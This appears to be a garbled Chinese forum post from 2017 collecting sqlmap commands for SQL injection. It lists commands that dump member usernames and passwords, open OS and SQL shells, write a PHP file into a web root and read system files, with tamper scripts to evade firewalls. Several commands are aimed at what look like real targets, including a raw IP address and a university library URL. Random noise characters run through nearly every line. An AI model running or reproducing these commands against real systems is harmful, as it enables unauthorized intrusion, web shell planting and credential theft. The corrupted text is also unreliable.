/pentest/database/sqlmap9 e" Z! ]) C) V0 R
/ |# K' Z- d) l9 ~" |update :::::> in the folder after execute following order : svn update2 {: X, o/ G& M) n
6 K2 Y6 T5 r# \) J1 ^* M8 c# n
sqlmap.py -r 1.txt --current-db& h* b& A0 X. @) m( B
' R. f* V9 U$ l" ]- ~ ^) y; I6 P' lv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”9 I! a( o! O- w2 v8 {4 H, f
6 s) I- S2 d) @, B
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) ! x) t7 @" Y; R, Z( ?) \3 A
猜解数据库
/ @3 E" ?1 w. a/ m./sqlmap.py -u "injection-url" --dbs
5 ^# Y6 n! E `sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"6 j' w% i, l3 x
8 p5 I. F* w7 A- a: H5 p/ |
猜解表名
d+ m" ^5 j: ^1 c4 x" m. q./sqlmap.py -u "injection-url" -D database_name --tables& Y- \. s, z. L# `
4 x7 l! }* |5 M% `4 L& w' g4 J Ysqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
3 j* b' e1 H7 W, p/ S3 @$ usqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
1 J$ V& _. r6 W6 x" [( A" `8 J+ m7 S, `5 d
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
: T4 ?, n, d; @ D: O+ ~
/ o* y4 O% L# h3 I8 Ssqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
: ~" j# B( f0 qsqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
% h& R/ l4 {' Z Csqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" - W* d4 V# ]; \1 c9 J Q
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"5 ]) B7 c' q0 k6 _
! z8 q8 T: H/ V3 }- G4 {. `1 _sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
! R. M1 b# e$ }7 vsqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
+ A( r& N! F; j/ B& Osqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
' b2 K- t* n; T8 \$ esqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"3 x* P# ?# e# O* d
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
+ W2 a# `8 d8 B" S, T/ N# r' e# Y. [) c3 L1 _" _* ^0 [6 s
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了
, K& D. I$ `2 p# ?- b: _sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py": o x5 \8 c9 g
0 I$ l5 C( s# V, x6 I
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"8 J3 J9 F7 ~+ B+ J2 {+ L5 G8 d
猜解列名
% C- ^) `; W$ \) u/ h./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
5 b7 V6 ?$ Z' |! c4 V3 [* z( W o# B) g
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" 9 L z- w5 d/ i: t* u
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" 4 f' o9 d; f( L( L+ B! C
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"% A# p0 c2 r. n2 b/ h
, H2 N( N! I1 I! q0 R5 ?$ q5 Csqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"" }0 M) E+ u7 Q' n% V4 A
&submit=Go+ H, O# F6 B! [ t
猜解值. @0 I5 i u* C9 W2 g6 ^. k, [6 x. Y
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump3 G4 C: r4 u( p2 I5 A; s2 O9 L, I
======================================================== j1 P* {+ a I, F+ U0 I
搜索表名中包括mana字符的6 w/ g" [0 i1 q9 v& `2 m# `
/sqlmap.py -u "injection-url" -T mana --search
6 h, ]/ _. D0 u" J! X0 G返回一个交互式sql shell6 g- k [+ d6 ^+ m* E+ D$ i/ j
/sqlmap.py -u "injection-url" --sql-shell
7 e2 Q) e' B7 C& b5 I% F8 v' M, o读取指定文件(需权限)" G7 d' F! q% J9 g4 |
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
5 E0 m( J6 ?/ Y4 s( L1 D4 O9 j& T查看当前 用户 及 数据库 9 b! Y; j- Y* k C2 I: Y! G
/sqlmap.py -u "injection-url" --current-user --current-db
$ k5 i r0 [4 P# k# g本地文件 写入 远程目标绝对路径6 f8 \" T C+ d# {, g0 c
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
0 W3 X8 z% i1 J6 T* R7 y, Y8 F# Gsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" / r+ l9 _& w+ ]1 v
; i8 X3 P% ~0 T
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径( F" [( D& `; N( M" H0 X
查看某用的权限) o8 E, q$ J+ T- M: X: }" g) O
/sqlmap.py -u "injection-url" --privileges -U root" } I( I( M% ^, C y9 _
查看当前用户是否为dba! h/ B$ z7 S4 T, ?% ~
/sqlmap.py -u "injection-url" --is-dba! o& i$ R1 ?8 Z6 \, `& H( j, x
读取所有数据库用户或指定数据库用户的密码" z" f+ T8 }* u0 Q0 N* K0 r8 a
sqlmap.py -r 1.txt --users --passwords4 l. t9 U& C& ?" j$ i/ _9 x; J8 j
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" . O( g# h0 h8 ]! c! s9 b
/ U+ k$ \% M' c' A* a/sqlmap.py -u "injection-url" --passwords -U root9 @) t. E3 f5 @$ d
/ U+ t8 v9 K I# t--start&&--stop 与 --first&&--last 的区别/ u% j* V2 P; _; ?) ]3 r
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
J/ e7 J$ b" E. s+ ]0 h. l- k$ N( ~0 E) _0 A
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
! f3 B- |( \5 o3 n/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
( ]) L4 X; I5 Q* W5 \/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
- `! p3 f2 J: w& K5 c9 i% n, V( s, g+ T7 l
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
5 g$ [4 d- M6 E5 B h. `/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
: y) J! [* V) l
/ ?/ m' W4 m+ f, w, U |
发表于 2017-5-19 17:03:10
收藏
支持
反对